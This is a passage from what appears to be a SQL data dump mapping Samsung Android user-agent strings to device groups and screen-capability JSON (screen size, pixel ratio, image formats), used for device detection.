Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A207M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A215U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A215W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A217F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A217M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A3050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A305FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A305G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A305GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A305GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A305YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A307G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A307GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A307GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A315G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A405FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A405FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A426B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A505W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A5070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A507FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A515U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A515U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A515W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A516B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A516U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A600GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A605F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A605FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A605G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A605GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A6060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A7050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A705F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A705FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A705GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A705MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A705W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A705YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A707F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A715W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A716U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A750FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A750G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A750GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A805F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-F700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":879,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-F900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":585,\"screenHeight\":820,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G398FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G715FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G885F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G965F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G965N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G965U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 